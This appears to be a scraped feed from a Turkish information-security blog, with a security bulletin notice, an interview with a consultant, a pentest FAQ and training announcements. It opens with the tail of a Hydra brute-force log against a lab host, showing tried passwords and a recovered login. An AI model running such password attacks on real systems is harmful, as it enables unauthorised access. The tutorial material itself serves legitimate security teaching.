[ATTEMPT] target 10.10.10.1 – login “bga” – pass “01230ph45in3” – child 10 – 689 of 4417
[ATTEMPT] target 10.10.10.1 – login “bga” – pass “01230ph45in43” – child 11 – 690 of 4417
[STATUS] attack finished for 10.10.10.1 (waiting for childs to finish)
[80][www] host: 10.10.10.1 login: bga password: 0u7b00k
[ATTEMPT] target 10.10.10.1 – login “bga” – pass “0u7b00k” – child 3 – 4417 of 4417
Hydra (http://www.thc.org) finished at 2010-11-28 11:19:33

Her iki araç da hemen hemen aynı hızlarda parola deneme işlemi yapabiliyor. Her iki aracın da performansı sunucu kapasitesi, yapılandırımı ve bant genişliğiyle orantılıdır.


Detay bilgi için “Apache Htaccess Korumalı Sayfalara Yönelik Güvenlik Testleri” konulu  belge incelenebilir.

The post Basic Authentication Korumalı Sayfalara Bruteforce Denemesi first appeared on Complexity is the enemy of Security.

]]>
http://blog.lifeoverip.net/2011/02/20/basic-authentication-korumali-sayfalara-bruteforce-denemesi/feed/ 0
Netsec Güvenlik Bülteni: Sayı 32 – 19.08.2010 http://blog.lifeoverip.net/2010/08/19/2683/ http://blog.lifeoverip.net/2010/08/19/2683/#respond Thu, 19 Aug 2010 07:45:06 +0000 http://blog.lifeoverip.net/?p=2683 Netsec ağ ve bilgi güvenliği listesi üyeleri tarafından hazırlanan güvenlik bülteninin 32. sayısı çıktı. http://netsec.lifeoverip.net/duyuru/netsec-ag-ve-guvenlik-bulteni-sayi32-19-08-2010/ adresinden okuyabilirsiniz.

The post Netsec Güvenlik Bülteni: Sayı 32 – 19.08.2010 first appeared on Complexity is the enemy of Security.

]]>
Netsec ağ ve bilgi güvenliği listesi üyeleri tarafından hazırlanan güvenlik bülteninin 32. sayısı çıktı.

http://netsec.lifeoverip.net/duyuru/netsec-ag-ve-guvenlik-bulteni-sayi32-19-08-2010/ adresinden okuyabilirsiniz.

The post Netsec Güvenlik Bülteni: Sayı 32 – 19.08.2010 first appeared on Complexity is the enemy of Security.

]]>
http://blog.lifeoverip.net/2010/08/19/2683/feed/ 0
Netsec Güvenlik Bülteni: Sayı 31 – 03.08.2010 http://blog.lifeoverip.net/2010/08/03/netsec-guvenlik-bulteni-sayi-31-%e2%80%93-03-08-2010/ http://blog.lifeoverip.net/2010/08/03/netsec-guvenlik-bulteni-sayi-31-%e2%80%93-03-08-2010/#comments Tue, 03 Aug 2010 12:21:21 +0000 http://blog.lifeoverip.net/?p=2575 Netsec ağ ve bilgi güvenliği listesi üyeleri tarafından hazırlanan güvenlik bülteninin 31. sayısı çıktı. http://netsec.lifeoverip.net/category/netsec-ag-ve-guvenlik-bulteni-sayi31-03-08-2010/ adresinden okuyabilirsiniz.

The post Netsec Güvenlik Bülteni: Sayı 31 – 03.08.2010 first appeared on Complexity is the enemy of Security.

]]>
Netsec ağ ve bilgi güvenliği listesi üyeleri tarafından hazırlanan güvenlik bülteninin 31. sayısı çıktı.

http://netsec.lifeoverip.net/category/netsec-ag-ve-guvenlik-bulteni-sayi31-03-08-2010/ adresinden okuyabilirsiniz.

The post Netsec Güvenlik Bülteni: Sayı 31 – 03.08.2010 first appeared on Complexity is the enemy of Security.

]]>
http://blog.lifeoverip.net/2010/08/03/netsec-guvenlik-bulteni-sayi-31-%e2%80%93-03-08-2010/feed/ 1
Güvenlik Röportajları #6 Deniz CEVIK http://blog.lifeoverip.net/2009/11/05/guvenlik-roportajlari-6-deniz-cevik/ http://blog.lifeoverip.net/2009/11/05/guvenlik-roportajlari-6-deniz-cevik/#respond Thu, 05 Nov 2009 20:30:25 +0000 http://blog.lifeoverip.net/?p=1633 Güvenlik kahvesinin bu haftaki konuğu bilgi güvenliği uzmanı Deniz ÇEVİK. NGB: Kısaca kendinizden bahsedebilir misiniz? Deniz ÇEVİK: 1999 yılında Trakya Universitesi Bilgisayar Mühendisliği bölümünden mezun oldum. Sonrasında ise Yeditepe Univeritesinde Elektronik ticaret ağırlıklı bir MBA yüksek lisansı yaptım. Profesyonel çalışma … Continue reading

The post Güvenlik Röportajları #6 Deniz CEVIK first appeared on Complexity is the enemy of Security.

]]>
Güvenlik kahvesinin bu haftaki konuğu bilgi güvenliği uzmanı Deniz ÇEVİK.

NGB: Kısaca kendinizden bahsedebilir misiniz?

Deniz ÇEVİK: 1999 yılında Trakya Universitesi Bilgisayar Mühendisliği bölümünden mezun oldum. Sonrasında ise Yeditepe Univeritesinde Elektronik ticaret ağırlıklı bir MBA yüksek lisansı yaptım. Profesyonel çalışma hayatıma 1999 yılı içinde intellect firmasında başladım. Bu firmada güvenlik alanında oldukça farklı konuda çalışma imkanım oldu.

İlk yıllarımda daha çok network güvenliği, firewallar, IPS gibi sistemler ile uğraşırken son 4-5 yıldır daha çok güvenlik eğitimleri, denetim ve danışmanlık hizmetleri alanına kaydım. Ağların güvenli hale getirilmesini amaçlayan çok sayıda proje tasarımında ve kurulumunda çalıştım. Şu sıralar BizNET firmasında güvenlik denetim, danışmanlık ve eğitim hizmetleri üzerine çalışıyorum.

NGB:Güvenlik isine nasil bulastiniz?

Deniz ÇEVİK:
Güvenlik konusu ile ilgilenmeye ciddi olarak üniversite yıllarında başladım. Kurumların henüz güvenlik konusunda yeni yeni yatırım yaptığı, syn attack ile sistemlerin göçtüğü, sendmail sayesinde root olunabilen, lquerpv komutları ile shadow dosyalarının rahatlıkla açılabildiği, winnuke ile ağda C&C oynayanların mavi ekranla tanıştığı güzel günlerdi.

Hep bu işlerin nasıl yapıldığını ve engellenebileceğini öğrenmeye yönelik ilgim oldu. Amacım mezun olunca yine bu alanda çalışmaktı ve arayışlarımı ona göre gerçekleştirdim. İşin ilginç yanı ilk iş görüşmemi de böyle bir firma ile yapmamdı. Pek çok kişinin bulamadığı bir fırsatı yakalayarak yapmak istediğim işe, iyi ve tecrübeli bir kadroya sahip firmada başlamış oldum.

NGB: Turkiye’de bilgi guvenligi konusunu degerlendirebilir misiniz

Deniz ÇEVİK:
Türkiyede bilgi güvenliği konusuna verilen önem gün geçtikçe artıyor ama yapılan yatırımlar daha çok günü kurtarmaya yönelik oluyor. Bilgi güvenliği denilince algılanan kavram aslında bilgi güvenliğinin çok daha küçük bir bölümünü oluşturuyor. İnsanların önemli bir kısmı bilgi güvenliğini hala firewall, anti virus, 5651’den ibaret sanıyor. Bu insanların büyük çoğunluğu güvenlik işini “ne gerekiyorsa alıp kuralım güvenli olalım” mantığında sadece ürün satın almak ve kullanmaktan ibaret sanıyor. Testlerin, danışmanlığın, kurumsal bir politika geliştirilip buna ciddiyetle ve üst yönetimin tam desteği ile uygulanmasının gerekli olduğu henüz yeterince anlaşılamamış durumda.

Güvenlik ürün kadar hizmet ve beyin gücü gerektiren bir iştir. Bu iş sonucu üretilen ürün ise genellikle elle tutulamayan ve daha çabuk eskiyen bir üründür. Dolayısı ile kısa bir süre sonra eskiyecek veya yapılan işin değerini gösterme fırsatını genellikle bulamayacağınız bir yere büyük paralar saçmak istenmiyor. Bunun yerine asansörleri en lüks granitler ile döşemek için bütçe ayırmak daha doğru bir yaklaşım olarak ele alınıyor (gibi geliyor :)). Sonuçta bir sektörün gelişimi ona yapılan yatırımla doğru oranda artacaktır. Güvenlik alanına yapılan yatırımların artması, bu konuda hizmet veren ve ürün üreten kurumların sayısının artmasını sağlayacaktır. Yine kurumların kaliteli hizmet alabilmesi için, belirli miktarların üzerinde danışmanlık ücretlerini gözden çıkarmaları gerekmekteki, hizmet sunanlar o tecrübede insanları elde tutabilsinler.

Yurtdışında güvenlik gereksinimlerini tanımlayan ve zorlayan regülasyonlar Türkiye’de çok eksik veya olsa bile uygulanmasında lakayt davranılıyor. BDDK’nın tebliği en ciddi uygulananlar arasında. PCI hala kaçamak şekilde uygulanıyor. Sarbannes Oaxley benzeri borsaya kote şirketleri zorlayacak bir kanun/yönetmelik SPK tarafından zorlanmıyor. ISO 27001 konusunda yeteri kadar teşvik/zorlama yok. BTK’nın yaptığı bazı düzenlemeler ve yeni planlanan e-devlet ve bilgi toplumu kanun tasarısı bu konuda yakın zamanda bazı ilerlemeler sağlayabilir gibi duruyor. Sanırım bunların etkin uygulanabilmesi için yurtdışında olduğu gibi medyaya yansıyan önemli güvenlik ihlallerinin türkiyede de olmasını bekleyeceğiz

Güvenlik hizmeti veren firmalar için bir akreditasyon mekanizması yok. İş kalitesi için zorunlu tutulan kriterler yok. Firmalar ya elemanlarına aldırdıkları sertifikalar ile ya da reputasyonlarını kullanarak satış yapmaya çalışıyorlar. Böyle bir kriter hazırlayabilecek, firmaları eğitebilecek ve hatta akredite edebilecek nitelikteki kuruluşlar ise bunları yapmak yerine hem kamu hem de özel sekörde, güvenlik hizmetleri veren firmalara karşı ihalesiz iş alabilmek, bütçe sorunu olmamak gibi avantajları kullanarak ciddi bir şekilde haksız rekabet ediyor, bana göre sektöre zarar veriyor.

Güvenlik firmaları pek çok nedenden dolayı para kazanmak için ürün satışını tercih ediyor, güvenlik için yazılım veya teknoloji üretmeye çabalayan firmalar yeterli desteği göremiyor.

NGB: Bu ise yeni baslayanlara neler onerirsiniz?

Deniz ÇEVİK:
Yeni başlayan arkadaşlarda bizim ilk aradığımız şey çalışma azmi ve öğrenme isteğidir.
Sürekli kendilerini geliştirme arayışında olsunlar. Bunun için önlerinde internet gibi inanılmaz bir kaynak bulunuyor. Her kapının başka bir kapıyı açtığı inanılmaz bir kütüphane. İşe başlarken hizmet veren bir firmada çalışmaları daha hızlı tecrübe kazanmalarına ve farklı sistemler, yapılar görme fırsatı sunacaktır. Bu onlara bilgiye daha hızlı sahip olma ve tecrübe açısından çok şey kazandıracaktır.


NGB: Sizce 2015 yilinda bilgi guvenligi dunyasi hangi konulari konusuyor olacak?

Deniz ÇEVİK: Genel itibari ile risk analiz, güvenlik süreçlerinin takibi, standartlara uyum, zafiyet yönetimi gibi ana konuların konuşulmaya devam edeceğini düşünüyorum. Son yıllarda mobil teknolojilerin kullanımında inanılmaz bir artış söz konusu, dolayısı ile bu yöne eğilimin ve güvenlik ihtiyaçlarının artacağını düşünüyorum.

Ürün satışı yerine kurumların servis satışlarına yönelerek gelir akışını sabit tutmaya yöneldiği göz çarpan bir başka husus. Uygulama problemlerine yönelik güvenlik arayışları devam edecektir, beklide web 3.0 ın sorunlarını konuşuyor olacağız. IPTV ve video-on-demand servislerinin de yaygın kullanılacağı, IP adresine sahip etkileşimli ev aletlerinin artacağı ve buna yönelik güvenlik arayışları ve sorunlarının artacağını da düşünülebilir.

Tüm güvenlik problemlerini istemci tarafında çözmeye çalışarak bu tip ürünlerin işletim sistemi ile entegre geleceğini düşünüyorum. Dolayısı ile Microsoft ile mcafee,symantec gibi firmaların birbirlerine dava açmaya başladıklarını görebiliriz.

NGB: Zaman ayırarak röportajımıza katıldığınız için teşekkür ederiz.

The post Güvenlik Röportajları #6 Deniz CEVIK first appeared on Complexity is the enemy of Security.

]]>
http://blog.lifeoverip.net/2009/11/05/guvenlik-roportajlari-6-deniz-cevik/feed/ 0
10 Soruda Pentest(Penetrasyon Testleri) http://blog.lifeoverip.net/2009/10/06/10-soruda-pentestpenetrasyon-testleri/ http://blog.lifeoverip.net/2009/10/06/10-soruda-pentestpenetrasyon-testleri/#comments Tue, 06 Oct 2009 06:13:40 +0000 http://blog.lifeoverip.net/?p=1434 Penetrasyon testleri(Sızma testleri) günümüz bilgi güvenliği dünyasının en popüler konularından biri. Bu konuda verdiğim eğitimlerde sık sık karşılaştığım belirli sorular oluyor, bunlara toptan cevap olması adına 10 soruda pentest konulu bir yazı hazırladım. Pentest nedir, neden yaptırmalıyım, kime nasıl yaptırmalıyım … Continue reading

The post 10 Soruda Pentest(Penetrasyon Testleri) first appeared on Complexity is the enemy of Security.

]]>
Penetrasyon testleri(Sızma testleri) günümüz bilgi güvenliği dünyasının en popüler konularından biri. Bu konuda verdiğim eğitimlerde sık sık heykirkarşılaştığım belirli sorular oluyor, bunlara toptan cevap olması adına 10 soruda pentest konulu bir yazı hazırladım. Pentest nedir, neden yaptırmalıyım, kime nasıl yaptırmalıyım gibi sorulara cevap arıyoruz. Sizin de bu konu hakkında fikirleriniz varsa yorumlarınızla zenginleştirebilirsiniz.

Öncelikle pentest kavramından ne anladığınızı  ve ne beklediğinizi bilmek size bu süreçte yardımcı olacaktır. Zira ne olduğunu bilmediğiniz bir servisi alarak sonradan bu muydu yani? Bu kadar parayı bu iş için mi verdim ya da bu sistemlere neden baktırmadım  gibi sorular sormayın kendinize.

1)Pentest nedir? Vulnerability assessment ve risk asssessment kavramlarından farkı nedir?

Pentest tanımı: Belirlenen bilişim sistemlerine mümkün olabilcek her yolun denenerek sızılmasıdır. Pentest de amaç güvenlik açıklığını bulmaktan öte bulunan açıklığı değerlendirip sistemlere yetkili erişimler elde etmektir.

Pentest çeşitleri: Whitebox, blackbox, graybox olmak üzere genel kabul görmüş üç çeşidi vardır. Bunlardan blackbox bizim genelde bildiğimiz ve yaptırdığımız pentest yöntemidir. Bu yöntemde testleri gerçekleştiren firmayla herhangi bir bilgi paylaşılmaz. Firma ismi ve firmanın sahip olduğu domainler üzerinden firmaya ait sistemler belirlenerek çalışma yapılır.

Diğer yöntemlerde pentest yapacak firmayla belirli bilgiler paylaşılır.

Vulnerability Assessment(zaafiyet tarama): Belirlenen sistemlerde güvenlik zaafiyetine sebep olabilecek açıklıkların araştırılması. Bu yöntem için genellikle otomatize araçlar kullanılır(Nmap, Nessus, Qualys vs)gibi.

Risk assessment tamamen farklı bir kavram olup pentest ve vuln. assessmenti kapsar. Zzaman zaman technical risk assessment tanımı kullanılarak Vulnerability assessment kastedilir.

2)Neden Pentest yaptırmalıyım?

Sahip olduğunuz bilişim sistemlerindeki güvenlik zaafiyetlerinin üçüncü bir göz tarafından kontrol edilmesi ve raporlanması proaktif güvenliğin ilk adımlarındandır. Siz ne kadar güvenliğe dikkat ederseniz birşeylerin gözünüzden kaçma ihtimali vardır ve internette hackerlarin sayısı ve bilgi becerisi her zaman sizden iyidir. Hackerlara yem olmadan kendi güvenliğinizi Beyaz şapkalı hackerlara test ettirmeniz yararınıza olaacktır.

Ek olarak PCI, HIPAA gibi standartlar da Pentest yaptırmayı zorunlu tutmaktadır.

3)Pentest projesinin planı nasıl olmalıdır?

Yaptırılacak pentestden olabildiğince çok verim alabilmek için her işte olduğu gibi burada da plan yapmak gerekir. Pentest planınıza en azından aşağıdaki soruları cevaplayarak hazırlayın

  • Pentest’in kapsamı ne olacak?
  • Sadece iç ağ sistemlerimimi, uygulamalarımı mı yoksa tüm altyapıyı mı test ettirmek istiyorum
  • Testleri kime yaptıracağım
  • Ne kadar sıklıkla yaptırmalıyım
  • Riskli sistem ve servisler kapsam dışı olmalı mı yoksa riski kabul edip sonucunu görmelimiyim.
  • DDOS denemesi yapılacak mı

4)Firma secimi konusunda nelere dikkat etmeliyim?

Pentest yapacak firma ne kadar güvenili olsa da-aranizda muhakkak imzalı ve maddeleri açık bir NDA olmalı- siz yine de kendinizi sağlama alma açısından firmanın yapacağı tüm işlemleri loglamaya çalışın. Bunu nasıl yaparsınız? Firmanın pentest yapacağı ip adres bilgilerini isteyerek bu ip adreslerinden gelecek tum trafiği Snort veya benzeri bir yazılım kullanarak loglayabilirsiniz.

  • Özellikle web trafiği -ki en kirik bilgiler burada çıkacaktır- Snort ile cok rahatlıkla sonradan incelendiğinde anlaşılacak şekilde kaydettirilebilir.
  • Firmada test yapacak çalışanların CVlerini isteyin . Varsa testi yapacak çalışanların konu ile ilgili sertifikasyonlara sahip olmasını ercih edin.
  • Testi yapacak çalışanların ilgili firmanın elemanı olmasına dikkat edin.
  • Firmaya daha önceki referanslarını sorun ve bunlardan birkaçına memnuniyetlerini sorun.
  • Mümkünse firma seçimi öncesinde teknik kapasiteyi belirlemek için tuzak sistemler kurarak firmaların bu sistemlere saldırması ve sizin de bildiğiniz açıklığı bulmalarını isteyin.
  • Firmadan daha önce yaptığı testlerle ilgili örnek raporlar isteyin.
  • Testlerin belirli ip adreslerinden yapılmasını ve bu ip adreslerinin size bildirilmesini talep edin.
  • Firmaya test için kullandıkları standartları sorun.
  • Firmanın test raporunda kullandığı tüm araçları da yazmasını isteyin.
  • Pentest teklifinin diğerlerine göre çok düşük olmaması

Penetration test firmanın özel işi mi yoksa oylesine yaptığı bir iş mi? Bu sorgu size firmanın konu hakkında yetkinliğine dair ipuçları verecektir.

5)Pentest yapan firmadan sonuç olarak neler beklemeliyim?

  • Yöneticilere ve teknik çalışanlara özel iki farklı rapor
  • Raporların okunabilir ve anlaşılır olması
  • Testler esnasında keşfedilen kritik seviye güvenlik açıklıklarının anında bildirilmesi
  • Pentest raporunun şifreli bir şekilde iletilmesi

6)Pentest sonrası nasıl bir yol izlemeliyim?

Pentest yaptırmak ne kadar önemliyse sonuçlarını değerlendirip aksiyon almak çok daha önemlidir.Malesef ki yaygın olarak yapılan yanlış sadece pentest yapıp raporu incelemek oluyor. Pentest sonrası açıklıkların kapatılmaması ve bir sonraki pentestde aynı açıklıkların tekrar çıkması sık karşılaşılan bir durumdur.

  • Pentest raporlarının üst yönetimle paylaşılıp yönetim desteğinin alınması
  • Sonuçlarının basit açıklıklar olarak değil, bir risk haritası kapsamında yönetime sunulması(bu açıklık hackerlar tarafından değerlendirilirse şu kadar kaybımız olur gibisinden)
  • Raporu detaylıca inceleyip her bir açıklığın kimin ilgi alanına girdiğinin belirlenmesi
  • Sistem yöneticileri/yazılımcılarla toplantı yapıp sonuçların paylaşılması
  • Açıklıkların kapatılmasının takibi
  • Bir sonraki pentestin tarihinin belirlenmesi

7)Turkiye’de pentest yapan hangi firmalar var?

Benim 2000 yılından beri çeşitli ortamlarda çalıştığım, raporlarını incelediğim ve ortanın üzerinde kabul ettiğim Pentest firmaları :

Güncel liste için http://blog.lifeoverip.net/2010/01/27/turkiyedeki-bilgi-guvenligi-firmalari/ adresini ziyaret edebilirsiniz.

  • BGA Bilgi Güvenliği Eğitim ve Danışmanlık Ltd. Şti https://www.bgasecurity.com/
  • Pro-G
  • Nebula Bilişim Hizmetleri
  • ADEO
  • BizNet
  • GamaSec
  • Tubitak UEKAE
  • Lostar B.G

Bunların haricinde bir de bireysel olarak bu işi yapanlar var. Bu konuda eğer pentest yapan kişiyi iyi tanımıyorsanız kişi yerine firmayı tercih etmeniz faydalı olacaktır.
8)Pentest konusunda kendimi geliştirmek için izleme gereken yol nedir?

Pentest konusunda kendinizi geliştirmek için öncelikle bu alana meraklı bir yapınızın olmasın gerekir. İçinizde bilişim konularına karşı ciddi merak hissi , sistemleri bozmaktan korkmadan kurcalayan bir düşünce yapınız yoksa işiniz biraz zor demektir. Zira pentester olmak demek başkalarının düşünemediğini düşünmek, yapamadığını yapmak ve farklı olmak demektir.

Bu işin en kolay öğrenimi bireysel çalışmalardır, kendi kendinize deneyerek öğrenmeye çalışmak, yanılmak sonra tekrar yanılmak ve doğrsunu öğrenmek. Eğitimler bu konuda destekci olabilir. Sizin 5-6 ayda katedeceğiniz yolu bir iki haftada size aktarabilir ama hiçbir zaman sizi tam manasıyla yetiştirmez, yol gösterici olur.

Pentest konularının konuşulduğu güvenlik listelerine üyelik de sizi hazır bilgi kaynaklarına doğrudan ulaştıracak bir yöntemdir.

Linux öğrenmek, pentest konusunda mutlaka elinizi kuvvetlendirecek, rakiplerinize fark attıracak bir bileziktir. Bu işi ciddi düşünüyorsanız mutlaka Linux bilgisine ihtiyaç duyacaksınız.
9)Pentest için hangi yazılımlar kullanılır?

Açıkkod Pentest Yazılımları: Nmap,  Nessus, Metasploit, Inguma, hping, Webscarab, jtr, W3af

Açık kodlu bilinen çoğu pentest yazılımı Backtrack güvenlik CDsi ile birlikte gelir. Bu araçları uygulamalı olarak öğrenmek isterseniz https://www.bgasecurity.com/egitim/kali-linux-101-egitimi/ eğitimine kayıt olabilirsiniz.

Ticari Pentest Yazılımları: Immunity Canvas, Core Impact, HP Webinspect, Saint Ssecurity Scanner

Bu araçların yanında araçlar kadar önemli olan pentest metodolojileri vardır. Bunların da araçlar kadar iyi bilinmesi ve kullanılması gerekir.

OWASP guide, NIST, ISSAF, OSTTM

10)Pentest konusunda hangi eğitimler vardır?

  • SANS’ın Pentest eğitimleri
  • Pentest eğitimleri
  • Ec-Council Pentest eğitimleri
  • http://www.penetration-testing.com/

The post 10 Soruda Pentest(Penetrasyon Testleri) first appeared on Complexity is the enemy of Security.

]]>
http://blog.lifeoverip.net/2009/10/06/10-soruda-pentestpenetrasyon-testleri/feed/ 4
Guvenlikegitimleri.com güz dönemi eğitimleri http://blog.lifeoverip.net/2009/09/15/guvenlikegitimleri-com-guz-donemi-egitimleri/ http://blog.lifeoverip.net/2009/09/15/guvenlikegitimleri-com-guz-donemi-egitimleri/#respond Tue, 15 Sep 2009 10:41:47 +0000 http://blog.lifeoverip.net/?p=1510 Yoğun geçen yaz dönemi ardından Ramazan’ı da fırsat bilerek yeni dönem eğitimlerini tekrar gözden geçirdim. Yeni dönemde sadece içerik güncellemesi yapmadık varolan eğitimlere ek üç tane farklı eğitim ekledik. Bunlar: Backtrack ile penetrasyon testleri eğitimi, Forensic analiz eğitimi ve Açık … Continue reading

The post Guvenlikegitimleri.com güz dönemi eğitimleri first appeared on Complexity is the enemy of Security.

]]>
duyuru_resim Yoğun geçen yaz dönemi ardından Ramazan’ı da fırsat bilerek yeni dönem eğitimlerini tekrar gözden geçirdim. Yeni dönemde sadece içerik güncellemesi yapmadık varolan eğitimlere ek üç tane farklı eğitim ekledik.

Bunlar: Backtrack ile penetrasyon testleri eğitimi, Forensic analiz eğitimi ve Açık kod güvenlik yazılımlarıyla sınır güvenliği eğitimi.

Şimdilik sadece Backtrack eğitimini açıyoruz. 2010 yılında diğer eğitimleri de vermeye başlayacağız. Eğitimlere kayıt olmak ya da detay bilgi almak için http://www.guvenlikegitimleri.com adresini ziyaret edebilirsiniz.

Yeni dönem eğitimleri ve tarihleri aşağıdaki gibidir. 3 Ekim 2009’a kadar yaptırılacak kesin kayıtlarda %20 indirim uygulanacaktır.

Uygulamalı TCP/IP Güvenliği Eğitimi 17 Ekim 2009


Backtrack ile Penetrasyon Testleri 24-25 Ekim 2009


Beyaz Şapkalı Hacker Eğitimi 31 Ekim 2009

The post Guvenlikegitimleri.com güz dönemi eğitimleri first appeared on Complexity is the enemy of Security.

]]>
http://blog.lifeoverip.net/2009/09/15/guvenlikegitimleri-com-guz-donemi-egitimleri/feed/ 0
SANS 560-: Network Penetration Testing and Ethical Hacking Eğitimi Türkiye’de http://blog.lifeoverip.net/2009/08/28/sans-560-network-penetration-testing-and-ethical-hacking-egitimi-turkiye%e2%80%99de/ http://blog.lifeoverip.net/2009/08/28/sans-560-network-penetration-testing-and-ethical-hacking-egitimi-turkiye%e2%80%99de/#comments Fri, 28 Aug 2009 04:55:23 +0000 http://blog.lifeoverip.net/?p=1465 SANS Organizasyonunun en popüler eğitimlerinden biri olan “Security 560: Network Penetration Testing and Ethical Hacking” eğitimi Ekim ayında  Mentor formatında İstanbul’da verilmeye başlanacak. Eğitim, içerik olarak “Reconnaissance” ile başlayıp “Scanning” , “Exploitation” ve “Password Attacks” şeklinde devam edip “Wireless Attacks” … Continue reading

The post SANS 560-: Network Penetration Testing and Ethical Hacking Eğitimi Türkiye’de first appeared on Complexity is the enemy of Security.

]]>
zans

SANS Organizasyonunun en popüler eğitimlerinden biri olan “Security 560: Network Penetration Testing and Ethical Hacking” eğitimi Ekim ayında  Mentor formatında İstanbul’da verilmeye başlanacak. Eğitim, içerik olarak “Reconnaissance” ile başlayıp “Scanning” , “Exploitation” ve “Password Attacks” şeklinde devam edip “Wireless Attacks” ve “Web Attacks” konularına değindikten sonra bütün anlatılanların bir CTF(Capture The Flag) uygulaması ile sonlandırılacağı bir eğitim olacaktır.

Bu eğitim de öğrenciye SANS’ın “Self Study” eğitiminde olduğu gibi kurs kitapları, kurs CD-DVD leri ve kurs MP3 dosyaları verilecektir. Bunun yanısıra Mentor eğitimine bağlı olarak online kurs materyali ve mentor “hands-on” lab notları öğrenciye verilecektir.  10 adet 2 saatlik oturumlar şeklinde oluşacak ve tamamen “hands-on” lablar şeklinde işlenecek olan eğitim, 10 Ekim 2009 tarihinde başlayıp 12 Aralık 2009 tarihinde sona erecektir. Bu oturumlar İbrahim Saruhan ve Halil Öztürkci tarafindan yönetilecek ve eğitime katılan tüm öğrencilerin lablarda aktif rol olması sağlanacaktır.

Eğitime kayıt detayları ve kayıt için http://www.sans.org/mentor/details.php?nid=19944 adresine bakabilirsiniz. 

Not: Gerek SANS’ın eğitim kalitesi gerek Halil’in eğitmenlik kalitesi bu eğitimi alınabilir kılıyor ama eğitim yöntemi konusunda tereddütlerim var. Bir ön session düzenlenebilirse eğitimin nasıl işleyeceği konusunda kafalardaki soru işaretlerinin azalmasını sağlayacaktır.

The post SANS 560-: Network Penetration Testing and Ethical Hacking Eğitimi Türkiye’de first appeared on Complexity is the enemy of Security.

]]>
http://blog.lifeoverip.net/2009/08/28/sans-560-network-penetration-testing-and-ethical-hacking-egitimi-turkiye%e2%80%99de/feed/ 10